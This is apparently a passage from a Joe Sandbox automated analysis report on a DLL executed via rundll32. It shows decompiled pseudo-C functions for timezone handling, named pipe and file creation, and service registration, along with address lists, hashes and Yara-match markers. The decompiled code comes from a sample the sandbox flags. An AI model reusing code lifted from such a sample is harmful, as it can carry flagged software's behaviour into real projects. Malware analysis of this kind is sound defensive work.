                0x7ffa535e670f
                0x7ffa535e671b
                0x7ffa535e6726
                0x7ffa535e6733
                0x7ffa535e673e
                0x7ffa535e674b
                0x7ffa535e6756
                0x7ffa535e6763
                0x7ffa535e676e
                0x7ffa535e677b
                0x7ffa535e6786
                0x7ffa535e6793
                0x7ffa535e679a
                0x7ffa535e67a7
                0x7ffa535e67ae
                0x7ffa535e67bb
                0x7ffa535e67c2
                0x7ffa535e67cf
                0x7ffa535e67d6
                0x7ffa535e67e3
                0x7ffa535e67ea
                0x7ffa535e67ec
                0x7ffa535e67f6
                0x7ffa535e67fb
                0x7ffa535e67fe
                0x7ffa535e6806
                0x7ffa535e680f
                0x7ffa535e6818
                0x7ffa535e681d
                0x7ffa535e6829
                0x7ffa535e683d
                0x7ffa535e683f
                0x7ffa535e6843
                0x7ffa535e6845
                0x7ffa535e6848
                0x7ffa535e684e
                0x7ffa535e6851
                0x7ffa535e6851
                0x7ffa535e6855
                0x7ffa535e6858
                0x7ffa535e6858
                0x7ffa535e685f
                0x7ffa535e6864
                0x7ffa535e6868
                0x7ffa535e686c
                0x7ffa535e6872
                0x7ffa535e6877
                0x7ffa535e6879
                0x7ffa535e687e
                0x7ffa535e6884
                0x7ffa535e6889
                0x7ffa535e6898
                0x7ffa535e689b
                0x7ffa535e689f
                0x7ffa535e68a0
                0x7ffa535e68a1
                0x7ffa535e68a6
                0x7ffa535e68b2
                0x7ffa535e68bc
                0x7ffa535e68be
                0x7ffa535e68c2
                0x7ffa535e68c5
                0x7ffa535e68ca
                0x7ffa535e68d6
                0x7ffa535e68dd
                0x7ffa535e68e0
                0x7ffa535e68ed
                0x7ffa535e68f7
                0x7ffa535e690b
                0x7ffa535e690e
                0x7ffa535e6917
                0x7ffa535e6926
                0x7ffa535e692b
                0x7ffa535e692e
                0x7ffa535e693c
                0x7ffa535e693e
                0x7ffa535e6940
                0x7ffa535e6944
                0x7ffa535e6949
                0x7ffa535e694b
                0x7ffa535e694f
                0x7ffa535e6952
                0x7ffa535e6960
                0x7ffa535e6962
                0x7ffa535e6964
                0x7ffa535e6968
                0x7ffa535e696d
                0x7ffa535e696f
                0x7ffa535e6976
                0x7ffa535e697c
                0x7ffa535e6984
                0x7ffa535e6986
                0x7ffa535e6986
                0x7ffa535e698d
                0x7ffa535e699b
                0x7ffa535e69a4
                0x7ffa535e69af
                0x7ffa535e69b8
                0x7ffa535e69c3
                0x7ffa535e69cc
                0x7ffa535e69d7
                0x7ffa535e69e4
                0x7ffa535e69ef
                0x7ffa535e69fc
                0x7ffa535e6a07
                0x7ffa535e6a14
                0x7ffa535e6a1b
                0x7ffa535e6a28
                0x7ffa535e6a2f
                0x7ffa535e6a3c
                0x7ffa535e6a43
                0x7ffa535e6a50
                0x7ffa535e6a57
                0x7ffa535e6a64
                0x7ffa535e6a6b
                0x7ffa535e6a6d
                0x7ffa535e6a77
                0x7ffa535e6a79
                0x7ffa535e6a7d
                0x7ffa535e6a80
                0x7ffa535e6a82
                0x7ffa535e6a8a
                0x7ffa535e6a93
                0x7ffa535e6a9c
                0x7ffa535e6a9e
                0x7ffa535e6aa2
                0x7ffa535e6aa4
                0x7ffa535e6aa4
                0x7ffa535e6aa7
                0x7ffa535e6aaf
                0x7ffa535e6ab1
                0x7ffa535e6ab5
                0x7ffa535e6abd
                0x7ffa535e6ac2
                0x7ffa535e6ac6
                0x7ffa535e6ac9
                0x7ffa535e6acb
                0x7ffa535e6ad3
                0x7ffa535e6ad8
                0x7ffa535e6ae1
                0x7ffa535e6af0
                0x7ffa535e6af6
                0x7ffa535e6af9
                0x7ffa535e6afe
                0x7ffa535e6b02
                0x7ffa535e6b05
                0x7ffa535e6b13
                0x7ffa535e6b18
                0x7ffa535e6b1a
                0x7ffa535e6b1f
                0x7ffa535e6b25
                0x7ffa535e6b2d
                0x7ffa535e6b2f
                0x7ffa535e6b3a
                0x7ffa535e6b40
                0x7ffa535e6b45
                0x7ffa535e6b4c
                0x7ffa535e6b5d
                0x7ffa535e6b5f
                0x7ffa535e6b64
                0x7ffa535e6b6e
                0x7ffa535e6b74
                0x7ffa535e6b7a
                0x7ffa535e6b84
                0x7ffa535e6b8b
                0x7ffa535e6b92
                0x7ffa535e6b99
                0x7ffa535e6b9e
                0x7ffa535e6bab
                0x7ffa535e6bb5
                0x7ffa535e6bbc
                0x7ffa535e6bc3
                0x7ffa535e6bca
                0x7ffa535e6bcf
                0x7ffa535e6bdc
                0x7ffa535e6be2
                0x7ffa535e6bef
                0x7ffa535e6bf6
                0x7ffa535e6bfd
                0x7ffa535e6c04
                0x7ffa535e6c09
                0x7ffa535e6c2f

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: +$-$f$p
                • API String ID: 3215553584-588565063
                • Opcode ID: 426e360ae1e79765073973edcb545938b5323c8836b4422cb39569a496d13089
                • Instruction ID: 306b8eff74f54417a3e7e20041b2527a56d57bda196a8f21fce89b5a13644fe6
                • Opcode Fuzzy Hash: 426e360ae1e79765073973edcb545938b5323c8836b4422cb39569a496d13089
                • Instruction Fuzzy Hash: FB12D822E2CB538EFB605B10D044279669BEFD27A0F9CD2B1D69D175C4CB3DE488AB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EB50C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155timeCOMMON
                Download Yara Rule
                C-Code - Quality: 43%
                			E00007FFA7FFA535EB50C(void* __ecx, void* __edx, void* __eflags, intOrPtr* __rax, void* __r8, signed long long _a8, long long _a16, signed long long _a24, char _a32) {
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				void* __rbx;
				void* _t34;
				int _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t49;
				void* _t55;
				void* _t56;
				intOrPtr* _t62;
				intOrPtr _t64;
				long long _t67;
				long long _t71;
				long long* _t73;
				intOrPtr* _t74;
				long long _t81;
				signed long long _t83;
				signed long long _t88;
				void* _t100;

				_t62 = __rax;
				_t48 = __edx;
				_t47 = __ecx;
				E00007FFA7FFA535EAA38(_t34);
				_a8 = 0;
				_t74 = _t62;
				_a16 = 0;
				_a24 = 0;
				E00007FFA7FFA535EAAA0(__edx, _t62,  &_a8);
				if (_t62 != 0) goto 0x535eb6cb;
				E00007FFA7FFA535EAA40(__edx, _t62,  &_a16);
				if (_t62 != 0) goto 0x535eb6b6;
				E00007FFA7FFA535EAA70(__edx, _t62,  &_a24);
				if (_t62 != 0) goto 0x535eb6a1;
				_t81 =  *0x53755278; // 0x0
				E00007FFA7FFA535E7E58(_t62, _t81);
				 *0x53755278 = 0;
				GetTimeZoneInformation(??);
				if (_t62 == 0xffffffff) goto 0x535eb67a;
				_t83 =  *0x53755290 * 0x3c;
				r8d = 1;
				_t55 =  *0x537552d6 - _t49; // 0x0
				_t88 =  *0x537552e4; // 0x0
				 *0x53755280 = r8d;
				_a8 = _t83;
				if (_t55 == 0) goto 0x535eb5b3;
				_a8 = _t83 + _t88 * 0x3c;
				_t56 =  *0x5375532a - _t49; // 0x0
				if (_t56 == 0) goto 0x535eb5d4;
				_t64 =  *0x53755338; // 0x0
				if (_t64 == 0) goto 0x535eb5d4;
				_a16 = r8d;
				_a24 = (_t64 - _t88) * 0x3c;
				goto 0x535eb5da;
				_a16 = 0;
				_a24 = 0;
				E00007FFA7FFA535F04CC(_t47, _t48, (_t64 - _t88) * 0x3c, _t74, _t83 + _t88 * 0x3c, _t88, _t100);
				r9d = r9d | 0xffffffff;
				_t67 =  &_a32;
				_v48 = _t67;
				_v56 = 0;
				_v64 = 0x3f;
				_v72 =  *_t74;
				WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				if (_t67 == 0) goto 0x535eb626;
				if (_a32 != 0) goto 0x535eb626;
				 *((intOrPtr*)( *_t74 + 0x3f)) = sil;
				goto 0x535eb62c;
				 *((intOrPtr*)( *_t74)) = sil;
				r9d = r9d | 0xffffffff;
				_v48 =  &_a32;
				_t71 =  *((intOrPtr*)(_t74 + 8));
				_v56 = 0;
				_v64 = 0x3f;
				_v72 = _t71;
				_t43 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				if (_t71 == 0) goto 0x535eb673;
				if (_a32 != 0) goto 0x535eb673;
				 *((intOrPtr*)( *((intOrPtr*)(_t74 + 8)) + 0x3f)) = sil;
				goto 0x535eb67a;
				_t73 =  *((intOrPtr*)(_t74 + 8));
				 *_t73 = sil;
				_t44 = E00007FFA7FFA535EAA30(_t43);
				 *_t73 = _a8;
				_t45 = E00007FFA7FFA535EAA20(_t44);
				 *_t73 = _a16;
				_t46 = E00007FFA7FFA535EAA28(_t45);
				 *_t73 = _a24;
				return _t46;
			}



























                0x7ffa535eb50c
                0x7ffa535eb50c
                0x7ffa535eb50c
                0x7ffa535eb518
                0x7ffa535eb523
                0x7ffa535eb526
                0x7ffa535eb529
                0x7ffa535eb52c
                0x7ffa535eb52f
                0x7ffa535eb536
                0x7ffa535eb540
                0x7ffa535eb547
                0x7ffa535eb551
                0x7ffa535eb558
                0x7ffa535eb55e
                0x7ffa535eb565
                0x7ffa535eb571
                0x7ffa535eb578
                0x7ffa535eb581
                0x7ffa535eb587
                0x7ffa535eb58e
                0x7ffa535eb592
                0x7ffa535eb599
                0x7ffa535eb59f
                0x7ffa535eb5a6
                0x7ffa535eb5a9
                0x7ffa535eb5b0
                0x7ffa535eb5b3
                0x7ffa535eb5ba
                0x7ffa535eb5bc
                0x7ffa535eb5c4
                0x7ffa535eb5c8
                0x7ffa535eb5cf
                0x7ffa535eb5d2
                0x7ffa535eb5d4
                0x7ffa535eb5d7
                0x7ffa535eb5da
                0x7ffa535eb5eb
                0x7ffa535eb5ef
                0x7ffa535eb5f5
                0x7ffa535eb5fa
                0x7ffa535eb5ff
                0x7ffa535eb607
                0x7ffa535eb60e
                0x7ffa535eb616
                0x7ffa535eb61b
                0x7ffa535eb620
                0x7ffa535eb624
                0x7ffa535eb629
                0x7ffa535eb630
                0x7ffa535eb634
                0x7ffa535eb640
                0x7ffa535eb646
                0x7ffa535eb64d
                0x7ffa535eb655
                0x7ffa535eb65a
                0x7ffa535eb662
                0x7ffa535eb667
                0x7ffa535eb66d
                0x7ffa535eb671
                0x7ffa535eb673
                0x7ffa535eb677
                0x7ffa535eb67d
                0x7ffa535eb682
                0x7ffa535eb687
                0x7ffa535eb68c
                0x7ffa535eb691
                0x7ffa535eb696
                0x7ffa535eb6a0

                APIs
                • _get_daylight.LIBCMT ref: 00007FFA535EB52F
                  • Part of subcall function 00007FFA535EAAA0: _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EAAB4
                • _get_daylight.LIBCMT ref: 00007FFA535EB540
                  • Part of subcall function 00007FFA535EAA40: _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EAA54
                • _get_daylight.LIBCMT ref: 00007FFA535EB551
                  • Part of subcall function 00007FFA535EAA70: _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EAA84
                  • Part of subcall function 00007FFA535E7E58: HeapFree.KERNEL32(?,?,?,00007FFA535E7915,?,?,?,?,?,?,00000000,00007FFA535E7C0D), ref: 00007FFA535E7E6E
                  • Part of subcall function 00007FFA535E7E58: GetLastError.KERNEL32(?,?,?,00007FFA535E7915,?,?,?,?,?,?,00000000,00007FFA535E7C0D), ref: 00007FFA535E7E80
                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFA535EB7B1), ref: 00007FFA535EB578
                • WideCharToMultiByte.KERNEL32 ref: 00007FFA535EB60E
                • WideCharToMultiByte.KERNEL32 ref: 00007FFA535EB65A
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                • String ID: ?
                • API String ID: 500310315-1684325040
                • Opcode ID: 111ad4cd6d1bb2ad17c1a5392ad20200b70e285143b38717c875d5bf34a77e23
                • Instruction ID: 4a97054d569c4b0cdfeb428315169a85bf3cda63ebc154d09537f472f6eee79c
                • Opcode Fuzzy Hash: 111ad4cd6d1bb2ad17c1a5392ad20200b70e285143b38717c875d5bf34a77e23
                • Instruction Fuzzy Hash: 2461C37292CF428AE750DF20E9401B9776AFFC6794F48A136EA0E52A94DF3CE445D740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520614038 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155timeCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 33%
                			E0000021521520614038(void* __ecx, void* __edx, void* __eflags, signed int** __rax, void* __rdx, signed int _a8, signed int _a16, signed int _a24, char _a32) {
				long long _v48;
				long long _v56;
				intOrPtr _v64;
				long long _v72;
				void* _t34;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				signed int _t55;
				signed int _t60;
				intOrPtr _t70;
				intOrPtr _t71;
				signed int** _t77;
				signed int* _t84;
				signed int** _t85;
				long long _t89;
				long long _t93;

				_t77 = __rax;
				E0000021521520613D50(_t34);
				_a8 = 0;
				_t85 = _t77;
				_a16 = 0;
				_a24 = 0;
				if (E0000021521520613DB8(__edx, _t77,  &_a8) != 0) goto 0x206141f7;
				if (E0000021521520613D58(__edx, _t77,  &_a16) != 0) goto 0x206141e2;
				if (E0000021521520613D88(__edx, _t77,  &_a24) != 0) goto 0x206141cd;
				_t89 =  *0x20682f98; // 0x0
				E000002152152060A780(_t77, _t89);
				 *0x20682f98 = _t93;
				if (GetTimeZoneInformation(??) == 0xffffffff) goto 0x206141a6;
				_t55 =  *0x20682fb0 * 0x3c;
				_t7 = _t93 + 1; // 0x1
				r8d = _t7;
				_t70 =  *0x20682ff6; // 0x0
				_t60 =  *0x20683004; // 0x0
				 *0x20682fa0 = r8d;
				_a8 = _t55;
				if (_t70 == 0) goto 0x206140df;
				_a8 = _t55 + _t60 * 0x3c;
				_t71 =  *0x2068304a; // 0x0
				if (_t71 == 0) goto 0x20614100;
				_t42 =  *0x20683058; // 0x0
				if (_t42 == 0) goto 0x20614100;
				_a16 = r8d;
				_a24 = (_t42 - _t60) * 0x3c;
				goto 0x20614106;
				_a16 = 0;
				_a24 = 0;
				E00000215215206074C8(_t77);
				r9d = r9d | 0xffffffff;
				_v48 =  &_a32;
				_v56 = _t93;
				_v64 = 0x3f;
				_v72 =  *_t85;
				if (WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??) == 0) goto 0x20614152;
				if (_a32 != 0) goto 0x20614152;
				( *_t85)[0xf] = sil;
				goto 0x20614158;
				 *( *_t85) = sil;
				r9d = r9d | 0xffffffff;
				_v48 =  &_a32;
				_v56 = _t93;
				_v64 = 0x3f;
				_v72 = _t85[1];
				if (WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??) == 0) goto 0x2061419f;
				if (_a32 != 0) goto 0x2061419f;
				_t85[1][0xf] = sil;
				goto 0x206141a6;
				_t84 = _t85[1];
				 *_t84 = sil;
				_t48 = E0000021521520613D48(_t47);
				 *_t84 = _a8;
				_t49 = E0000021521520613D38(_t48);
				 *_t84 = _a16;
				_t50 = E0000021521520613D40(_t49);
				 *_t84 = _a24;
				return _t50;
			}





















                0x21520614038
                0x21520614044
                0x2152061404f
                0x21520614052
                0x21520614055
                0x21520614058
                0x21520614062
                0x21520614073
                0x21520614084
                0x2152061408a
                0x21520614091
                0x2152061409d
                0x215206140ad
                0x215206140b3
                0x215206140ba
                0x215206140ba
                0x215206140be
                0x215206140c5
                0x215206140cb
                0x215206140d2
                0x215206140d5
                0x215206140dc
                0x215206140df
                0x215206140e6
                0x215206140e8
                0x215206140f0
                0x215206140f4
                0x215206140fb
                0x215206140fe
                0x21520614100
                0x21520614103
                0x21520614106
                0x21520614117
                0x21520614121
                0x21520614126
                0x2152061412b
                0x21520614133
                0x21520614142
                0x21520614147
                0x2152061414c
                0x21520614150
                0x21520614155
                0x2152061415c
                0x21520614160
                0x21520614172
                0x21520614179
                0x21520614181
                0x2152061418e
                0x21520614193
                0x21520614199
                0x2152061419d
                0x2152061419f
                0x215206141a3
                0x215206141a9
                0x215206141ae
                0x215206141b3
                0x215206141b8
                0x215206141bd
                0x215206141c2
                0x215206141cc

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                • String ID: ?
                • API String ID: 500310315-1684325040
                • Opcode ID: 8a5c3eb81ff16a2648225461e465bfc374ee5137f32fe503cd95229368054096
                • Instruction ID: d0c4c2961d8ed56b38c2447a7ce31f54ecc17cdd045859ce1c2289c543595707
                • Opcode Fuzzy Hash: 8a5c3eb81ff16a2648225461e465bfc374ee5137f32fe503cd95229368054096
                • Instruction Fuzzy Hash: 0A617D33202A60DAEB709F21E8897D9B7A4FFE4794F640156AE4947B9CDB38D985C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205BA220 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 149filepipeCOMMON
                Download Yara Rule
                C-Code - Quality: 54%
                			E00000215215205BA220(void* __ecx, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
				void* __rdi;
				void* __rbp;
				signed int _t75;
				signed int _t82;
				void* _t86;
				void* _t88;
				long long _t103;
				long long _t107;
				long long _t112;
				long long _t113;
				void* _t141;
				intOrPtr* _t142;
				intOrPtr* _t146;
				void* _t148;
				void* _t149;
				long long _t151;
				void* _t152;
				void* _t168;

				_t88 = __ecx;
				_t103 = _t151;
				 *((long long*)(_t103 + 8)) = __rcx;
				_t149 = _t103 - 0x57;
				_t152 = _t151 - 0x100;
				 *((long long*)(_t149 - 0x11)) = 0xfffffffe;
				 *((long long*)(_t103 + 0x10)) = __rbx;
				 *((long long*)(_t103 + 0x18)) = __rsi;
				_t142 = __r9;
				_t112 = __r8;
				_t146 = __rcx;
				 *((long long*)(_t149 + 0x77)) = __rcx;
				E00000215215205BD260(_t86, __r8, __rcx, _t149, __rdx, _t168);
				 *((long long*)(_t149 + 0x77)) = _t146 + 0x60;
				E00000215215205BD260(_t86, _t112, _t146 + 0x60, _t149, _t112, _t141);
				if ( *((long long*)(__r9 + 0x18)) - 0x10 < 0) goto 0x205ba27c;
				goto 0x205ba27f;
				 *((long long*)(_t152 + 0x38)) = _t112;
				 *((intOrPtr*)(_t152 + 0x30)) = 0;
				 *((intOrPtr*)(_t152 + 0x28)) = 0x2000;
				 *((intOrPtr*)(_t152 + 0x20)) = 0x2000;
				_t14 = _t112 + 1; // 0x1
				r9d = _t14;
				r8d = 0;
				CreateNamedPipeA(??, ??, ??, ??, ??, ??, ??, ??);
				 *((long long*)(_t149 + 0x77)) = _t103;
				if (_t103 != 0xffffffff) goto 0x205ba329;
				E00000215215205893D0(_t112, _t149 - 9, "create_named_pipe(", _t146, _t149, __r9, _t112);
				E0000021521520589550(_t149 + 0x17, _t103, __r9, _t149, ") failed");
				_t113 = _t103;
				E00000215215205B86E0(_t103, _t113, _t152 + 0x40);
				asm("movups xmm0, [eax]");
				asm("movaps [ebp-0x61], xmm0");
				E00000215215205B7F10(_t88, 0x40000001, _t113, _t149 - 0x41, _t149 - 0x61, _t149, _t113, _t112);
				 *((long long*)(_t149 - 0x41)) = 0x2063fb98;
				 *((long long*)(_t149 - 0x41)) = 0x2063fa28;
				E00000215215205F9940(_t113, _t149 - 0x41, 0x2066bb58, _t146, _t148);
				 *((long long*)(_t152 + 0x40)) = 0x2063fa28;
				 *((long long*)(_t149 - 0x79)) = 0x2063fa28;
				 *((long long*)(_t149 - 0x71)) = _t113;
				 *((long long*)(_t152 + 0x20)) = _t152 + 0x40;
				_t75 = E00000215215205B97C0(0x40000001, _t152 + 0x40, _t113,  *_t146, _t149 - 0x61, _t142, _t146, _t146 + 8, _t149 + 0x77);
				_t107 =  *((intOrPtr*)(_t149 - 0x71));
				if ((_t75 & 0x00000001) == 0) goto 0x205ba38f;
				if (_t107 != 1) goto 0x205ba36f;
				if ((_t75 & 0xffffff00 |  *((intOrPtr*)(_t152 + 0x40)) != 0x00000000) == 0) goto 0x205ba38f;
				E0000021521520590B90(_t88, _t113, _t149 - 0x41, _t152 + 0x40, "assign");
				E000002152152059DF30(_t75 & 0xffffff00 |  *((intOrPtr*)(_t152 + 0x40)) != 0x00000000, _t113, _t149 - 0x41, _t146, "assign");
				if ( *((long long*)(_t142 + 0x18)) - 0x10 < 0) goto 0x205ba399;
				 *((long long*)(_t152 + 0x30)) = _t113;
				 *((intOrPtr*)(_t152 + 0x28)) = 0x40000000;
				 *((intOrPtr*)(_t152 + 0x20)) = 3;
				r9d = 0;
				r8d = 0;
				CreateFileA(??, ??, ??, ??, ??, ??, ??);
				 *((long long*)(_t149 + 0x77)) = _t107;
				if (_t107 != 0xffffffff) goto 0x205ba3d9;
				E00000215215205B87E0(_t88, 0x40000000, _t107, "create_file() failed", _t146, _t149);
				asm("int3");
				 *((long long*)(_t152 + 0x40)) = _t107;
				 *((long long*)(_t149 - 0x79)) = _t107;
				 *((long long*)(_t149 - 0x71)) = _t113;
				 *((long long*)(_t152 + 0x20)) = _t152 + 0x40;
				_t82 = E00000215215205B97C0(0x40000000, _t152 + 0x40, _t113,  *((intOrPtr*)(_t146 + 0x60)), _t149 - 0x61,  *_t142, _t146, _t146 + 0x68, _t149 + 0x77);
				if ((_t82 & 0x00000001) == 0) goto 0x205ba43f;
				if ( *((intOrPtr*)(_t149 - 0x71)) != 1) goto 0x205ba41f;
				if ((_t82 & 0xffffff00 |  *((intOrPtr*)(_t152 + 0x40)) != 0x00000000) == 0) goto 0x205ba43f;
				E0000021521520590B90(_t88, _t113, _t149 - 0x41, _t152 + 0x40, "assign");
				return E000002152152059DF30(_t82 & 0xffffff00 |  *((intOrPtr*)(_t152 + 0x40)) != 0x00000000, _t113, _t149 - 0x41, _t146, "assign");
			}





















                0x215205ba220
                0x215205ba220
                0x215205ba223
                0x215205ba22b
                0x215205ba22f
                0x215205ba236
                0x215205ba23e
                0x215205ba242
                0x215205ba246
                0x215205ba249
                0x215205ba24c
                0x215205ba24f
                0x215205ba256
                0x215205ba260
                0x215205ba26a
                0x215205ba275
                0x215205ba27a
                0x215205ba281
                0x215205ba286
                0x215205ba28a
                0x215205ba292
                0x215205ba29a
                0x215205ba29a
                0x215205ba29e
                0x215205ba2a6
                0x215205ba2ac
                0x215205ba2b4
                0x215205ba2c4
                0x215205ba2d8
                0x215205ba2dd
                0x215205ba2e5
                0x215205ba2ea
                0x215205ba2ed
                0x215205ba2fc
                0x215205ba309
                0x215205ba314
                0x215205ba323
                0x215205ba32b
                0x215205ba330
                0x215205ba334
                0x215205ba341
                0x215205ba351
                0x215205ba356
                0x215205ba35c
                0x215205ba362
                0x215205ba36d
                0x215205ba37f
                0x215205ba389
                0x215205ba394
                0x215205ba399
                0x215205ba39e
                0x215205ba3a6
                0x215205ba3ae
                0x215205ba3b1
                0x215205ba3bc
                0x215205ba3c2
                0x215205ba3ca
                0x215205ba3d3
                0x215205ba3d8
                0x215205ba3db
                0x215205ba3e0
                0x215205ba3e4
                0x215205ba3f1
                0x215205ba401
                0x215205ba40c
                0x215205ba412
                0x215205ba41d
                0x215205ba42f
                0x215205ba459

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Create$ExceptionFileNamedPipeThrow
                • String ID: ) failed$assign$create_file() failed$create_named_pipe(
                • API String ID: 1863101382-2295884902
                • Opcode ID: 31473f7c7322ed7117c6be139aaa34e4687a2000083736df59db62a97b9846f2
                • Instruction ID: 44051473ac39ada203cafba33264b63a390481abd0765df09771047232db87c5
                • Opcode Fuzzy Hash: 31473f7c7322ed7117c6be139aaa34e4687a2000083736df59db62a97b9846f2
                • Instruction Fuzzy Hash: 0C616732306F50DAEB109F64E4482DD33B0FBA6798F600666AE5C53AADDF38D54AC740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520591610 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 112COMMON
                Download Yara Rule
                C-Code - Quality: 43%
                			E0000021521520591610() {
				void* _t71;
				intOrPtr _t77;
				long long _t83;
				intOrPtr _t84;
				long long _t87;
				intOrPtr _t91;
				intOrPtr* _t98;
				long long _t107;
				intOrPtr* _t108;
				long long _t110;
				long long _t111;
				void* _t113;
				void* _t114;
				void* _t116;
				long long _t119;
				long long _t121;
				long long _t122;

				_t71 = _t116;
				_t114 = _t71 - 0x5f;
				 *((long long*)(_t114 + 7)) = 0xfffffffe;
				 *((long long*)(_t71 + 8)) = _t83;
				 *((long long*)(_t71 + 0x10)) = _t110;
				 *((long long*)(_t71 + 0x18)) = _t107;
				 *((long long*)(_t71 + 0x20)) = _t121;
				_t122 = _t119;
				_t108 = _t98;
				_t111 = _t87;
				if ( *((intOrPtr*)(_t87 + 0x28)) ==  *((intOrPtr*)(_t119 + 0x18))) goto 0x205916b0;
				 *((long long*)(_t114 - 0x29)) = 0x206278d0;
				 *((long long*)(_t114 - 0x21)) = 0x206278d0;
				 *((long long*)(_t114 - 0x19)) = 0x206278d0;
				 *((long long*)(_t114 - 0x39)) = "Invalid service owner.";
				 *((char*)(_t114 - 0x31)) = 1;
				E00000215215205F7764(_t83, _t114 - 0x39, _t114 - 0x21, _t108, _t111);
				 *((long long*)(_t114 - 0x29)) = 0x20627910;
				 *((long long*)(_t114 - 0x29)) = 0x2063c6d8;
				E00000215215205A0060(_t83, _t114 + 0xf, _t114 - 0x29);
				E00000215215205F9940(_t83, _t114 + 0xf, 0x2066b790, _t111, _t113);
				 *((long long*)(_t114 - 0x29)) = _t111;
				EnterCriticalSection(??);
				 *((char*)(_t114 - 0x21)) = 1;
				_t84 =  *((intOrPtr*)(_t111 + 0x30));
				if (_t84 == 0) goto 0x20591788;
				_t77 =  *((intOrPtr*)(_t84 + 0x10));
				if (_t77 == 0) goto 0x205916eb;
				_t91 =  *((intOrPtr*)(_t108 + 8));
				if (_t91 == 0) goto 0x205916eb;
				if (_t77 != _t91) goto 0x205916eb;
				goto 0x20591713;
				if ( *((intOrPtr*)(_t84 + 8)) == 0) goto 0x20591711;
				if ( *_t108 == 0) goto 0x20591711;
				if (E00000215215205F781C( *((intOrPtr*)(_t84 + 8)) + 8,  *_t108 + 8) != 0) goto 0x20591711;
				goto 0x20591713;
				if (0 != 0) goto 0x20591722;
				if ( *((intOrPtr*)(_t84 + 0x20)) != 0) goto 0x205916d0;
				goto 0x20591788;
				 *((long long*)(_t114 - 0x11)) = 0x206278d0;
				 *((long long*)(_t114 - 9)) = 0x206278d0;
				 *((long long*)(_t114 - 1)) = 0x206278d0;
				 *((long long*)(_t114 - 0x39)) = "Service already exists.";
				 *((char*)(_t114 - 0x31)) = 1;
				E00000215215205F7764( *((intOrPtr*)(_t84 + 0x20)), _t114 - 0x39, _t114 - 9, _t108, _t111);
				 *((long long*)(_t114 - 0x11)) = 0x20627910;
				 *((long long*)(_t114 - 0x11)) = 0x2063c128;
				E000002152152059FEF0( *((intOrPtr*)(_t84 + 0x20)), _t114 + 0xf, _t114 - 0x11);
				E00000215215205F9940( *((intOrPtr*)(_t84 + 0x20)), _t114 + 0xf, 0x2066b848, _t111);
				asm("movups xmm0, [edi]");
				asm("inc ecx");
				 *((long long*)(_t122 + 0x20)) =  *((intOrPtr*)(_t111 + 0x30));
				 *((long long*)(_t111 + 0x30)) = _t122;
